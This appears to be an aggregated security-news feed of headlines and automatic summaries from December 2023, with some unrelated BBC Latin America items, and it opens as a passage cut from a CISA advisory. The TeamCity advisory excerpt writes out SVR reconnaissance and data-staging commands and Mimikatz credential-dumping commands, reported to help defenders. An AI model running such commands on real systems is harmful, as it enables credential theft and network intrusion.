            Recommendations include: Before deploying any new devices in a networked environment, change all default passwords for applications, operating systems, routers, firewalls, wireless access points, and other systems to have values consistent with administration-level accounts [CPG 2.A]. Disable deprecated protocols (including NetBIOS, LLMNR, and mDNS) on the network that are not strictly necessary for business functions, or limit the systems and services that use the protocol, where possible [CPG 2.W]. Conduct periodic scans of server machines using automated tools to determine whether sensitive data (e.g., personally identifiable information, health, credit card, or classified information) is present on the system in cleartext. Mandate MFA, ideally phishing-resistant MFA, for privileged users and make MFA a default, rather than opt-in, feature. Use unique credentials across workstations, when possible, in accordance with applicable federal standards, industry best practices, and/or agency-defined requirements.

            Recognizing that insecure software is the root cause of the majority of these flaws, and that the responsibility should not be on the end user, CISA urges software manufacturers to implement the following to reduce the prevalence of misconfigurations, weak passwords, and other weaknesses identified and exploited through the assessment team: Embed security into product architecture throughout the entire software development lifecycle (SDLC). By using secure by design tactics, software manufacturers can make their product lines secure “out of the box” without requiring customers to spend additional resources making configuration changes, purchasing security software and logs, monitoring, and making routine updates.

            RESOURCES / REFERENCES: [1] Github | kgretzky / evilginx; [2] Github | lgandx / Responder; [3] Network security LAN Manager authentication level - Windows Security | Microsoft Learn; [4] Service principal names - Win32 apps | Microsoft Learn; [5] Github | fortra / impacket; [6] Github | byt3bl33d3r / ; Github | ly4k / Certipy; [8] Github | topotam / PetitPotam; [9] Github | fortra / impacket / examples; [10] Github | login-securite / DonPAPI; [11] SP 800-63B, Digital Identity Guidelines: Authentication and Lifecycle Management | CSRC (nist.gov).

            APPENDIX: MITRE ATT&CK TACTICS AND TECHNIQUES. Table 7: CISA Team ATT&CK Techniques for Reconnaissance (columns: Reconnaissance Technique Title, ID, Use). Active Scanning: "


            US drops charges against Peruvian man accused of hoax bomb threats

            latam
            2023-12-14 https://www.bbc.co.uk/news/world-us-canada-67722477?at_medium=RSS&at_campaign=KARANGA
            Eddie Manuel Nunez Santos was wrongly accused of bomb threats that targeted schools and synagogues. "

            Autosummary: "


            A closer look at LATMA, the open-source lateral movement detection tool

            financial
            2023-12-13 https://www.helpnetsecurity.com/2023/12/13/latma-open-source-tool-video/

            In this Help Net Security video, Gal Sadeh, Head of Data and Security Research at Silverfort, discusses LATMA, a free, open-source tool. It’s engineered with advanced algorithms to track and report any unusual activity within an environment. The tool consists of two modules: Logs collector – This module collects authentication traffic from the Active Directory environment. It gathers the logs from the domain controllers and endpoints, focusing only on interactive Kerberos and NTLM authentications. Analyzer … More

            The post A closer look at LATMA, the open-source lateral movement detection tool appeared first on Help Net Security.

            "

            Autosummary: "


            ThreatNG open-source datasets aim to improve cybersecurity practices

            ciber
            2023-12-13 https://www.helpnetsecurity.com/2023/12/13/threatng-open-source-datasets/

            The ThreatNG Governance and Compliance Dataset is an open-source initiative that aims to democratize access to critical data, fostering transparency, collaboration, and improvement of cybersecurity practices globally.

            Datasets for organizational insight

            The open-source datasets offered by ThreatNG provide an understanding of organizational practices, promoting informed decision-making and accountability within the corporate landscape. These datasets include: ESG (Environmental, Social, Governance) filings – A dataset highlighting a company’s dedication to sustainability, ethical behavior, and good governance, offering … More

            The post ThreatNG open-source datasets aim to improve cybersecurity practices appeared first on Help Net Security.

            "

            Autosummary: How you can use the datasets. Eric Gonzales, founder of ThreatNG, told Help Net Security what they experienced with their security service provider customers/partners, along with how they have used the ethics and governance documents: Develop compliant incident response plans. These documents provide frameworks for developing incident response plans that comply with the customer’s ethical and governance requirements. "


            Industry regulations and standards are driving OT security priorities

            industry
            2023-12-13 https://www.helpnetsecurity.com/2023/12/13/ot-environments-ransomware-impact/

            When it comes to ransomware attacks, the impact on OT environments is catching up to the impact on IT environments, according to Claroty. In Claroty’s previous survey conducted in 2021, 32% of ransomware attacks impacted IT only, while 27% impacted both IT and OT. Today, 21% impact IT only, while 37% impact both IT and OT – a significant 10% jump for the latter in just two years. This trend speaks to the expanding attack … More

            The post Industry regulations and standards are driving OT security priorities appeared first on Help Net Security.

            "

            Autosummary: The most popular methods are the Common Vulnerability Scoring System (CVSS), used by 52% of global respondents, followed by existing security solutions’ risk scores (49%), the Exploit Prediction Scoring System (EPSS) (46%), and the Known Exploited Vulnerabilities (KEV) Catalog (45%). "


            Argentina peso: Milei begins "shock therapy" by devaluing currency

            latam
            2023-12-13 https://www.bbc.co.uk/news/business-67688727?at_medium=RSS&at_campaign=KARANGA
            The South American nation's new government is trying to tackle its worst crisis in decades.


            Which cybersecurity controls are organizations struggling with?

            ciber
            2023-12-13 https://www.helpnetsecurity.com/2023/12/13/organizations-cybersecurity-controls/

            How are organizations performing across cybersecurity controls in the Minimum Viable Secure Product (MVSP) framework? A recent analysis by Bitsight and Google reveals some good and some bad results – and room for improvement. What is MVSP? Minimum Viable Secure Product (MVSP) is a baseline security checklist for B2B software and business process outsourcing suppliers, consisting of 25 controls across four key areas – Business, Application Design, Application Implementation, and Operational. For the “Cybersecurity Control … More

            The post Which cybersecurity controls are organizations struggling with? appeared first on Help Net Security.

            "

            Autosummary: Eight MVSP controls that are important for vulnerability management – External Testing, Self-assessment, Vulnerability Prevention, Encryption, HTTPS-only, Security Headers, Dependency Patching, Time to Fix Vulnerabilities – have either high 2023 Fail rates, low Pass rates, or both, across all industries. "


            Major Cyber Attack Paralyzes Kyivstar - Ukraine"s Largest Telecom Operator

            Telcos
            2023-12-13 https://thehackernews.com/2023/12/major-cyber-attack-paralyzes-kyivstar.html
            Ukraine"s biggest telecom operator Kyivstar has become the victim of a cyber attack, disrupting customer access to mobile and internet services. "The cyberattack on Ukraine"s #Kyivstar telecoms operator has impacted all regions of the country with high impact to the capital, metrics show, with knock-on impacts reported to air raid alert network and banking sector as work continues "

            Autosummary: KillMilk has since announced that he was retiring, and appointed a new leader "Deanon Club," who has claimed that "there will be a large-scale recruitment for the KillNet team, on all fronts" with the goal of striking government financial facilities, encryption firms, and the gambling sector. "


            EOL Sophos firewalls get hotfix for old but still exploited vulnerability (CVE-2022-3236)

            exploits
            2023-12-13 https://www.helpnetsecurity.com/2023/12/13/eol-sophos-firewalls-cve-2022-3236/

            Over a year has passed since Sophos delivered patches for a vulnerability affecting Sophos Firewalls (CVE-2022-3236) that was being actively exploited by attackers, and now it has pushed additional ones to protect vulnerable EOL devices. “In December 2023, we delivered an updated fix after identifying new exploit attempts against this same vulnerability in older, unsupported versions of the Sophos Firewall,” the company shared on Monday by updating the original security advisory. “No action is … More

            The post EOL Sophos firewalls get hotfix for old but still exploited vulnerability (CVE-2022-3236) appeared first on Help Net Security.

            "

            Autosummary: "


            How to Analyze Malware’s Network Traffic in A Sandbox

            exploits
            2023-12-13 https://thehackernews.com/2023/12/how-to-analyze-malwares-network-traffic.html
            Malware analysis encompasses a broad range of activities, including examining the malware's network traffic. To be effective at it, it's crucial to understand the common challenges and how to overcome them. Here are three prevalent issues you may encounter and the tools you'll need to address them. Decrypting HTTPS traffic Hypertext Transfer Protocol Secure (HTTPS), the protocol for secure

            Autosummary: You can explore these and numerous other features of ANY.RUN, including private space for your team, Windows 7, 8, 10, 11 VMs, and API integration completely for free. Use case: Information about AxileStealer provided by the ANY.RUN sandbox. In this example, the initial file, 237.06 KB in size, drops AxileStealer's executable file, 129.54 KB in size.


            Microsoft Warns of Hackers Exploiting OAuth for Cryptocurrency Mining and Phishing

            financial exploits
            2023-12-13 https://thehackernews.com/2023/12/microsoft-warns-of-hackers-exploiting.html
            Microsoft has warned that adversaries are using OAuth applications as an automation tool to deploy virtual machines (VMs) for cryptocurrency mining and launch phishing attacks. "Threat actors compromise user accounts to create, modify, and grant high privileges to OAuth applications that they can misuse to hide malicious activity," the Microsoft Threat Intelligence team said in an

            Autosummary: "In some cases, following the stolen session cookie replay activity, the actor leveraged the compromised user account to perform BEC financial fraud reconnaissance by opening email attachments in Microsoft Outlook Web Application (OWA) that contain specific keywords such as 'payment' and 'invoice'," Microsoft said.


            OAuth apps used in cryptocurrency mining, phishing campaigns, and BEC attacks

            financial
            2023-12-13 https://securityaffairs.com/155756/hacking/oauth-applications-abuse-attacks.html
            Microsoft warns that threat actors are using OAuth applications in cryptocurrency mining campaigns and phishing attacks. Threat actors are using OAuth applications as an automation tool in cryptocurrency mining campaigns and other financially motivated attacks. The attackers compromise user accounts to create, modify, and grant high privileges to OAuth applications to carry out malicious activity […]

            Autosummary: Microsoft provided the following mitigations to reduce the impact of these types of threats: mitigate the risk of credential guessing attacks; enable conditional access policies; ensure continuous access evaluation is enabled; enable security defaults; enable Microsoft Defender automatic attack disruption.


            Colombian EMC rebel group to stop kidnapping for ransom

            latam
            2023-12-13 https://www.bbc.co.uk/news/world-latin-america-67703478?at_medium=RSS&at_campaign=KARANGA
            Kidnappings for ransom are on the rise, but the EMC rebel group says it will now stop the practice.


            LockBit ransomware now poaching BlackCat, NoEscape affiliates

            exploits ransomware
            2023-12-13 https://www.bleepingcomputer.com/news/security/lockbit-ransomware-now-poaching-blackcat-noescape-affiliates/
            The LockBit ransomware operation is now recruiting affiliates and developers from the BlackCat/ALPHV and NoEscape operations after recent disruptions and exit scams. [...]

            Autosummary: LockBit recruits affiliates from distressed gangs As first reported by LeMagIT, LockBitSupp, the LockBit operation's manager, has begun to recruit affiliates from the BlackCat and NoEscape ransomware operations.


            CISA: Russian hackers target TeamCity servers since September

            government rusia-ucrania
            2023-12-13 https://www.bleepingcomputer.com/news/security/cisa-russian-hackers-target-teamcity-servers-since-september/
            CISA and partner cybersecurity agencies and intelligence services warned that the APT29 hacking group linked to Russia's Foreign Intelligence Service (SVR) has been targeting unpatched TeamCity servers in widespread attacks since September 2023. [...]

            Autosummary: "By choosing to exploit CVE-2023-42793, a software development program, the authoring agencies assess the SVR could benefit from access to victims, particularly by allowing the threat actors to compromise the networks of dozens of software developers," CISA warned today.


            Hackers are exploiting critical Apache Struts flaw using public PoC

            exploits
            2023-12-13 https://www.bleepingcomputer.com/news/security/hackers-are-exploiting-critical-apache-struts-flaw-using-public-poc/
            Hackers are attempting to leverage a recently fixed critical vulnerability (CVE-2023-50164) in Apache Struts that leads to remote code execution, in attacks that rely on publicly available proof-of-concept exploit code. [...]

            Autosummary: The set of Cisco products under analysis includes the Customer Collaboration Platform, Identity Services Engine (ISE), Nexus Dashboard Fabric Controller (NDFC), Unified Communications Manager (Unified CM), Unified Contact Center Enterprise (Unified CCE), and Prime Infrastructure.


            Microsoft patches 34 vulnerabilities, including one zero-day

            exploits
            2023-12-13 https://www.malwarebytes.com/blog/news/2023/12/microsoft-patches-34-vulnerabilities-including-one-zero-day
            Microsoft and other vendors have released their rounds of December updates on or before Patch Tuesday. Update now!

            Autosummary: The other vulnerability we wanted to highlight is listed as CVE-2023-35628, a Windows MSHTML platform remote code execution (RCE) vulnerability with a CVSS score of 8.1 out of 10 and in severity listed as “Critical.”


            BazaCall Phishing Scammers Now Leveraging Google Forms for Deception

            financial
            2023-12-13 https://thehackernews.com/2023/12/bazacall-phishing-scammers-now.html
            The threat actors behind the BazaCall call back phishing attacks have been observed leveraging Google Forms to lend the scheme a veneer of credibility. The method is an "attempt to elevate the perceived authenticity of the initial malicious emails," cybersecurity firm Abnormal Security said in a report published today. BazaCall (aka BazarCall), which was first

            Autosummary: The use of Google Forms is also clever in that the responses are sent from the address "forms-receipts-noreply@google[.]com," which is a trusted domain and, therefore, have a higher chance of bypassing secure email gateways, as evidenced by a recent Google Forms phishing campaign uncovered by Cisco Talos last month.


            UK Home Office is ignoring the risk of ‘catastrophic ransomware attacks,’ report warns

            exploits ransomware
            2023-12-13 https://securityaffairs.com/155778/security/home-office-ignores-ransomware-attacks-risks.html
            A Joint Committee on the National Security Strategy (JCNSS) warns of the high risk of a catastrophic ransomware attack on the UK government. The British government is accused of failing to mitigate the risk of ransomware attacks. According to a parliamentary report published by the Joint Committee on the National Security Strategy (JCNSS) the UK […]

            Autosummary: Pierluigi Paganini, December 13, 2023. A Joint Committee on the National Security Strategy (JCNSS) warns of the high risk of a catastrophic ransomware attack on the UK government.


            BazarCall attacks abuse Google Forms to legitimize phishing emails

            financial
            2023-12-13 https://www.bleepingcomputer.com/news/security/bazarcall-attacks-abuse-google-forms-to-legitimize-phishing-emails/
            A new wave of BazarCall attacks uses Google Forms to generate and send payment receipts to victims, attempting to make the phishing attempt appear more legitimate. [...]

            Autosummary: BazarCall, first documented in 2021, is a phishing attack utilizing an email resembling a payment notification or subscription confirmation to security software, computer support, streaming platforms, and other well-known brands.


            French police arrests Russian suspect linked to Hive ransomware

            exploits ransomware rusia-ucrania
            2023-12-13 https://www.bleepingcomputer.com/news/security/french-police-arrests-russian-suspect-linked-to-hive-ransomware/
            French authorities arrested a Russian national in Paris for allegedly helping the Hive ransomware gang with laundering their victims' ransom payments. [...]

            Autosummary: "At the same time, the full cooperation with Europol, Eurojust and the Cypriot authorities made it possible to search his home in a Cypriot seaside resort, thus providing important elements of investigation," said Nicolas Guidoux, a Deputy Director in the French Ministry of the Interior.


            Ransomware review: December 2023

            exploits
            2023-12-13 https://www.malwarebytes.com/blog/threat-intelligence/2023/12/ransomware-review-december-2023
            In November, ransomware gangs attacked at least 457 victims—the highest monthly count in 2023, after May's record numbers.

            Autosummary: (Figures: Known ransomware attacks by gang, November 2023; Known ransomware attacks by country, November 2023; Known ransomware attacks by industry, November 2023.) One of the most interesting developments last month were new reports reinforcing claims that Rhysida may be a rebrand of the infamous Vice Society ransomware gang. The explanation, then, likely resides in a combination of facts: ransomware attacks are up overall for all sectors; healthcare is easy to attack (large number of weak points due to use of legacy systems, third-party vendors, etc.). Preventing Ransomware with ThreatDown (Figures: ThreatDown detecting LockBit ransomware; ThreatDown automatically quarantining LockBit ransomware.) ThreatDown Bundles combine the technologies and services that resource-constrained IT teams need into four streamlined, cost-effective bundles that take down threats, take down ransomware gangs:


            Balancing AI advantages and risks in cybersecurity strategies

            ciber
            2023-12-12 https://www.helpnetsecurity.com/2023/12/12/matt-holland-field-effect-ai-cyber-threats/

            In this Help Net Security interview, Matt Holland, CEO of Field Effect, discusses achieving a balance for businesses between the advantages of using AI in their cybersecurity strategies and the risks posed by AI-enhanced cyber threats. Holland also explores how education, awareness, and implemented measures prepare organizations for these evolving challenges. Furthermore, he underscores that relying solely on AI-driven solutions without human expertise leads to disaster. There’s a lot of buzz around AI supercharging cyberattacks. … More

            The post Balancing AI advantages and risks in cybersecurity strategies appeared first on Help Net Security.

            "

            Autosummary: That’s not to say there’s no reason to be concerned, though—AI and LLMs could be used to create even more sophisticated social engineering campaigns—think deepfakes, audio messages, recordings, and even well-crafted emails that would be much harder to discern from the real thing.Instead, look for a trusted partner that can help manage your protection, and invest in a holistic solution that can evaluate your cyber risk and proactively detect security events across your entire IT environment—including endpoints, networks, and any cloud or SaaS infrastructure you rely on. "


            New Critical RCE Vulnerability Discovered in Apache Struts 2 - Patch Now

            exploits
            2023-12-12 https://thehackernews.com/2023/12/new-critical-rce-vulnerability.html
            Apache has released a security advisory warning of a critical security flaw in the Struts 2 open-source web application framework that could result in remote code execution. Tracked as CVE-2023-50164, the vulnerability is rooted in a flawed "file upload logic" that could enable unauthorized path traversal and could be exploited under the circumstances to upload a malicious file


            Lazarus exploit Log4Shell vulnerability to deliver novel RAT malware

            exploits
            2023-12-12 https://www.helpnetsecurity.com/2023/12/12/lazarus-log4shell/

            North Korea-backed group Lazarus has been spotted exploiting the Log4Shell vulnerability (CVE-2021-44228) and novel malware written in DLang (i.e., the memory-safe D programming language). “This campaign consists of continued opportunistic targeting of enterprises globally that publicly host and expose their vulnerable infrastructure to n-day vulnerability exploitation such as CVE-2021-44228. We have observed Lazarus target manufacturing, agricultural and physical security companies,” Cisco Talos researchers shared. Log4Shell still opens doors Log4Shell is a critical remote code execution … More

            The post Lazarus exploit Log4Shell vulnerability to deliver novel RAT malware appeared first on Help Net Security.

            "

            Autosummary: Then they deployed HazyLoad – a custom-made proxy tool – to gain continuous access, create a new local user account, and download credential dumping tools (ProcDump, MimiKatz), as well as a novel DLang-based remote access trojan (RAT) called NineRAT, which was first spotted in a campaign in March 2023. "


            New MrAnon Stealer Malware Targeting German Users via Booking-Themed Scam

            financial exploits
            2023-12-12 https://thehackernews.com/2023/12/new-mranon-stealer-targeting-german-it.html
            A phishing campaign has been observed delivering an information stealer malware called MrAnon Stealer to unsuspecting victims via seemingly benign booking-themed PDF lures. "This malware is a Python-based information stealer compressed with cx-Freeze to evade detection," Fortinet FortiGuard Labs researcher Cara Lin said. "MrAnon Stealer steals its victims' credentials, system


            Ukraine"s largest mobile carrier Kyivstar down following cyberattack

            ciber Telcos
            2023-12-12 https://www.bleepingcomputer.com/news/security/ukraines-largest-mobile-carrier-kyivstar-down-following-cyberattack/
            Kyivstar, Ukraine"s largest telecommunications service provider serving over 25 million mobile and home internet subscribers, has suffered a cyberattack impacting mobile and data services. [...] "

            Autosummary: The official website is offline, but the company informed subscribers via its social media channels that it was targeted by hackers this morning, causing a technical failure that impacts mobile communications and internet access. "


            Over 1,450 pfSense servers exposed to RCE attacks via bug chain

            exploits
            2023-12-12 https://www.bleepingcomputer.com/news/security/over-1-450-pfsense-servers-exposed-to-rce-attacks-via-bug-chain/
            Roughly 1,450 pfSense instances exposed online are vulnerable to command injection and cross-site scripting flaws that, if chained, could enable attackers to perform remote code execution on the appliance. [...]

            Autosummary: Netgate, the vendor of pfSense, received reports about the three flaws on July 3, 2023, and released security updates that addressed them on November 6 (pfSense Plus 23.09) and November 16 (pfSense CE 2.7.1).


            Russian APT28 Hackers Targeting 13 Nations in Ongoing Cyber Espionage Campaign

            rusia-ucrania
            2023-12-12 https://thehackernews.com/2023/12/russian-apt28-hackers-targeting-13.html
            The Russian nation-state threat actor known as APT28 has been observed making use of lures related to the ongoing Israel-Hamas war to facilitate the delivery of a custom backdoor called HeadLace. IBM X-Force is tracking the adversary under the name ITG05, which is also known as BlueDelta, Fancy Bear, Forest Blizzard (formerly Strontium), FROZENLAKE, Iron Twilight, Sednit, Sofacy, and


            Operation Blacksmith: Lazarus exploits Log4j flaws to deploy DLang malware

            exploits
            2023-12-12 https://securityaffairs.com/155681/apt/operation-blacksmith-lazarus-log4j.html
            North Korea-linked APT group Lazarus was spotted exploiting Log4j vulnerabilities to deploy previously undocumented remote access trojans. The North Korea-linked APT group Lazarus is behind a new hacking campaign that exploits Log4j vulnerabilities to deploy previously undocumented remote access trojans (RATs). Cisco Talos researchers tracked the campaign as Operation Blacksmith; the nation-state actors are employing at least […]

            Autosummary: Blacksmith: Initial reconnaissance by Lazarus: The APT group gains initial access through successful exploitation of CVE-2021-44228; Lazarus deploys NineRAT; “NineRAT is written in DLang and indicates a definitive shift in TTPs from APT groups falling under the Lazarus umbrella with the increased adoption of malware being authored using non-traditional frameworks such as the Qt framework, including MagicRAT and QuiteRAT.”


            Our Lady of Guadalupe: Pilgrims converge on basilica in Mexico

            latam
            2023-12-12 https://www.bbc.co.uk/news/world-latin-america-67690996?at_medium=RSS&at_campaign=KARANGA
            Millions of pilgrims have visited the basilica in Mexico in the run-up to the day dedicated to the Virgin.


            Microsoft December 2023 Patch Tuesday fixes 34 flaws, 1 zero-day

            exploits
            2023-12-12 https://www.bleepingcomputer.com/news/microsoft/microsoft-december-2023-patch-tuesday-fixes-34-flaws-1-zero-day/
            Today is Microsoft"s December 2023 Patch Tuesday, which includes security updates for a total of 34 flaws and one previously disclosed, unpatched vulnerability in AMD CPUs. [...] "

            Autosummary: The number of bugs in each vulnerability category is listed below: 10 Elevation of Privilege Vulnerabilities 8 Remote Code Execution Vulnerabilities 6 Information Disclosure Vulnerabilities 5 Denial of Service Vulnerabilities 5 Spoofing Vulnerabilities The total count of 34 flaws does not include 8 Microsoft Edge flaws fixed on December 7th. "


            How to choose a free vulnerability scanner: Insights from an industry veteran

            exploits industry
            2023-12-12 https://www.malwarebytes.com/blog/business/2023/12/how-to-choose-a-free-vulnerability-scanner-insights-from-an-industry-veteran
            How to choose a free vulnerability scanner? Industry expert Robert Elworthy has the answers.

            Autosummary: Alternative: ThreatDown Vulnerability Assessment solution For teams seeking a streamlined approach, the ThreatDown Vulnerability Assessment solution, free for all ThreatDown customers, offers: Single, Lightweight Agent To simplify security and reduce costs, Vulnerability Assessment deploys easily in minutes without a reboot, using the same agent and cloud-based console that powers all ThreatDown endpoint security technologies. Elworthy, reflecting on his Langdale experience, highlights the importance of a tool capable of handling large-scale environments efficiently, a critical aspect for organizations with extensive networks: “Free tools often struggle with large networks,” Elworthy said. Elworthy points out the hidden labor costs in using “free” tools, which can affect team efficiency: “The time and labor required to maintain scans and update tools can be significant,” Elworthy said, reflecting on his time at Langdale.


            Kyivstar, Ukraine’s largest mobile carrier brought down by a cyber attack

            Telcos
            2023-12-12 https://securityaffairs.com/155701/hacking/cyberattack-brought-down-ukraine-kyivstar.html
            Kyivstar, the largest Ukraine service provider, was hit by a cyber attack that paralyzed its services. The attack is linked to the ongoing conflict. Kyivstar, the largest Ukraine service provider, was down after a major cyber attack. The Ukrainian telecommunications company provides communication services and data transmission based on a broad range of fixed and mobile technologies, […]

            Autosummary: Pierluigi Paganini, December 12, 2023. “This morning we became the target of a powerful cyber attack that caused a technical failure that led to temporarily unavailable services: 🔸 mobile connection; 🔸 Internet access.


            Ukrainian military intelligence service hacked the Russian Federal Taxation Service

            rusia-ucrania
            2023-12-12 https://securityaffairs.com/155727/cyber-warfare-2/ukraine-hacked-russian-federal-taxation-service.html
            The Ukrainian government’s military intelligence service announced the hack of the Russian Federal Taxation Service (FNS). Hackers of the Main Intelligence Directorate of the Ministry of Defense of Ukraine announced they have compromised the Russian Federal Taxation Service (FNS). The military intelligence service said that the hack was the result of a successful special operation […]

            Autosummary: “During the special operation, military intelligence managed to break into one of the well-protected key central servers of the Federal Tax Service (FSS of the Russian Federation), and further into more than 2,300 of its regional servers throughout Russia, as well as in the territory of the temporarily occupied Crimea,” reads a statement published by the Main Intelligence Directorate of the Ministry of Defense of Ukraine.


            Russian Foreign Intelligence Service (SVR) Exploiting JetBrains TeamCity CVE Globally

            exploits government rusia-ucrania
            2023-12-12 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a

            SUMMARY

            The U.S. Federal Bureau of Investigation (FBI), U.S. Cybersecurity & Infrastructure Security Agency (CISA), U.S. National Security Agency (NSA), Polish Military Counterintelligence Service (SKW), CERT Polska (CERT.PL), and the UK’s National Cyber Security Centre (NCSC) assess Russian Foreign Intelligence Service (SVR) cyber actors—also known as Advanced Persistent Threat 29 (APT 29), the Dukes, CozyBear, and NOBELIUM/Midnight Blizzard—are exploiting CVE-2023-42793 at a large scale, targeting servers hosting JetBrains TeamCity software since September 2023.

            Software developers use TeamCity software to manage and automate software compilation, building, testing, and releasing. If compromised, access to a TeamCity server would provide malicious actors with access to that software developer’s source code, signing certificates, and the ability to subvert software compilation and deployment processes—access a malicious actor could further use to conduct supply chain operations. Although the SVR used such access to compromise SolarWinds and its customers in 2020, the limited number and seemingly opportunistic types of victims currently identified indicate that the SVR has not used the access afforded by the TeamCity CVE in a similar manner. The SVR has, however, been observed using the initial access gleaned by exploiting the TeamCity CVE to escalate its privileges, move laterally, deploy additional backdoors, and take other steps to ensure persistent and long-term access to the compromised network environments.

            To bring Russia’s actions to public attention, the authoring agencies are providing information on the SVR’s most recent compromise to aid organizations in conducting their own investigations and securing their networks, provide compromised entities with actionable indicators of compromise (IOCs), and empower private sector cybersecurity companies to better detect and counter the SVR’s malicious actions. The authoring agencies r

            Autosummary: SQL Server executable files – based on the review of the post-exploitation actions, the SVR showed an interest in specific files of the SQL Server installed on the compromised systems: C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlmin.dll, C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqllos.dll, C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqllang.dll, C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqltses.dll, C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\secforwarder.dll.
            Visual Studio files – based on the review of the post-exploitation actions, the SVR showed an interest in specific files of Visual Studio: C:\Program Files (x86)\Microsoft Visual Studio\2017\SQL\Common7\IDE\VSIXAutoUpdate.exe.
            Update management agent files – based on the review of the post-exploitation actions, the SVR showed an interest in executables and configuration of patch management software: C:\Program Files (x86)\PatchManagementInstallation\Agent\12\Httpd\bin\httpd.exe, C:\Program Files (x86)\PatchManagementInstallation\Agent\12\Httpd, C:\ProgramData\GFI\LanGuard 12\HttpdConfig\httpd.conf.
            Interest in SQL Server – based on the review of the exploitation, the SVR also showed an interest in details of the SQL Server [T1059.001], [T1505.001]: powershell Compress-Archive -Path "C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlmin.dll","C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqllos.dll","C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqllang.dll","C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqltses.dll" -DestinationPath C:\Windows\temp\1\sql.zip. SVR cyber actors also exfiltrated secforwarder.dll.
            Tactics Used to Avoid Detection – To avoid detection, the SVR used a “Bring Your Own Vulnerable Driver”
            Commands observed: nltest -dclist; nltest -dsgetdc; tasklist; netstat; wmic /node:"<redacted>" /user:"<redacted>" /password:"<redacted>" process list brief; wmic /node:"<redacted>" process list brief; wmic process get commandline -all; wmic process <proc_id> get commandline; wmic process where name="GoogleCrashHandler64.exe" get commandline,processed; powershell ([adsisearcher]"((samaccountname=<redacted>))").Findall().Properties; powershell ([adsisearcher]"((samaccountname=<redacted>))").Findall().Properties.memberof; powershell Get-WmiObject -Class Win32_Service -Computername; powershell Get-WindowsDriver -Online -All
            REG_DWORD /d "0" /f
            The SVR used the following Mimikatz commands [T1003]: privilege::debug; lsadump::cache; lsadump::secrets; lsadump::sam; sekurlsa::logonpasswords.
            Persistence – The SVR relied on scheduled tasks [T1053.005] to secure persistent execution of backdoors. [T1564], illustrated below:
            Privilege Escalation – To facilitate privilege escalation [T1098], the SVR used multiple techniques, including WinPEAS, NoLmHash registry key modification, and the Mimikatz tool.
            BMP files that were used to exchange data were generated in the following way: compress data using zlib, encrypt data using a custom algorithm, add the “***” string literal to the encrypted data, create a random BMP with a random rectangle, and finally encode the encrypted data within the lower pixel bits.
            Get-NetUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname, description, pwdlastset, logoncount, badpwdcount; Get-NetDiDomain; Get-AdUser; Get-DomainUser -UserName


            Javier Milei: New president tells Argentina "shock treatment" looms

            financial latam
            2023-12-11 https://www.bbc.co.uk/news/world-latin-america-67678276?at_medium=RSS&at_campaign=KARANGA
            The country's new far-right president vows to launch a radical economic programme as he is sworn in. "

            Autosummary: "


            Cybercriminals continue targeting open remote access products

            ransomware ciber
            2023-12-11 https://www.helpnetsecurity.com/2023/12/11/remote-access-malicious-actions/

            Cybercriminals still prefer targeting open remote access products, or like to leverage legitimate remote access tools to hide their malicious actions, according to WatchGuard. “Threat actors continue using different tools and methods in their attack campaigns, making it critical for organizations to keep abreast of the latest tactics to fortify their security strategy,” said Corey Nachreiner, chief security officer at WatchGuard. “Modern security platforms that include firewalls and endpoint protection software can deliver enhanced protection … More

            The post Cybercriminals continue targeting open remote access products appeared first on Help Net Security.

            "

            Autosummary: Still, script-based attacks remain the largest attack vector, accounting for 56% of total attacks, and scripting languages like PowerShell are often used in living-off-the-land attacks. For instance, in researching the top phishing domains, the Threat Lab observed a tech support scam that would result in a victim downloading a pre-configured, unauthorised version of TeamViewer, which would allow an attacker full remote access to their computer. "


            Adapting cybersecurity for the quantum computing era

            ciber
            2023-12-11 https://www.helpnetsecurity.com/2023/12/11/quantum-computing-data-security-implications-video/

            Researchers are exploring promising quantum computing applications across various domains, from cryptography and optimization problems to drug discovery and artificial intelligence. The race to harness the power of quantum bits has sparked a wave of innovation and collaboration, bringing together experts from physics, computer science, and engineering to unlock the full potential of this groundbreaking technology. Quantum computers, with their ability to perform complex calculations at speeds unattainable by classical counterparts, possess the potential to … More

            The post Adapting cybersecurity for the quantum computing era appeared first on Help Net Security.

            "

            Autosummary: "


            Kubescape open-source project adds Vulnerability Exploitability eXchange (VEX) support

            exploits
            2023-12-11 https://www.helpnetsecurity.com/2023/12/11/kubescape-vex-generation/

            With its innovative feature for generating reliable Vulnerability Exploitability eXchange (VEX) documents, Kubescape became the first open-source project to provide this functionality. This advancement offers security practitioners a powerful tool to effectively prioritize and address software vulnerabilities. What is Vulnerability Exploitability eXchange (VEX)? Vulnerability Exploitability eXchange (VEX) is a standard that facilitates the sharing and analyzing of information about vulnerabilities and their potential for exploitation. VEX documents have emerged as a critical component in complementing … More

            The post Kubescape open-source project adds Vulnerability Exploitability eXchange (VEX) support appeared first on Help Net Security.

            "

            Autosummary: “We are excited to be the first open-source project to generate VEX documents,” said Ben Hirschberg, CTO and co-founder of ARMO and maintainer of the Kubescape project. "


            CISA adds Qlik Sense flaws to its Known Exploited Vulnerabilities catalog

            exploits
            2023-12-11 https://securityaffairs.com/155615/security/cisa-qlik-sense-flaws-known-exploited-vulnerabilities-catalog.html
            U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds two Qlik Sense vulnerabilities to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added two Qlik Sense vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. Below is the list of the issues added to the catalog: Researchers at cybersecurity firm Praetorian discovered the two vulnerabilities […] "

            Autosummary: "


            Lazarus Group Using Log4j Exploits to Deploy Remote Access Trojans

            exploits
